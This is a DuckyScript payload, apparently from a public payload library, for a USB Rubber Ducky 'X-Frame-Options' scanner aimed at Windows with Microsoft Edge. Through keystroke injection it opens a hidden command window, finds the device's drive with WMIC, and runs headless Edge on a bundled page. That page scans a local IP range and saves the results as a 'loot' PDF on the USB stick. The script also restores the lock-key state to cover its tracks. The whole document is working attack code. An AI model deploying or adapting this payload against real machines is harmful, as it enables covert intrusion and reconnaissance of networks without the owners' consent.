Path: blob/master/payloads/library/recon/x-frame-options_scanner/payload.txt
2968 views
REM TITLE : "X-Frame-Options" Scanner1REM AUTHOR : TW-D2REM TARGET : Microsoft Edge3REM VERSION : 1.04REM CATEGORY : Recon5REM REQUIREMENT : DuckyScript 3.067ATTACKMODE HID STORAGE8DELAY 10000910REM ---11REM USB Rubber Ducky label.12REM ---13DEFINE #RD_LABEL DUCKY1415REM ---16REM Format of an allowed IPv4 address range.17REM 192.168.0.X-192.168.0.Y where (X < Y)18REM ---19DEFINE #LAN 192.168.0.1-192.168.0.502021SAVE_HOST_KEYBOARD_LOCK_STATE2223IF ( $_CAPSLOCK_ON ) THEN24CAPSLOCK25DELAY 50026END_IF2728IF ( $_NUMLOCK_ON == FALSE ) THEN29NUMLOCK30DELAY 50031END_IF3233GUI r34DELAY 150035STRINGLN CMD /K "MODE CON:COLS=18 LINES=1 && FOR /F %d IN ('WMIC Volume GET DriveLetter^, Label^|FINDSTR "#RD_LABEL"') DO @SET RD_LABEL=%d"36DELAY 200037STRINGLN START MSEDGE --headless --disable-gpu --run-all-compositor-stages-before-draw --print-to-pdf="%RD_LABEL%\loot_%RANDOM%.pdf" "%RD_LABEL%\recon_files\index.html?lan=#LAN" && EXIT3839RESTORE_HOST_KEYBOARD_LOCK_STATE404142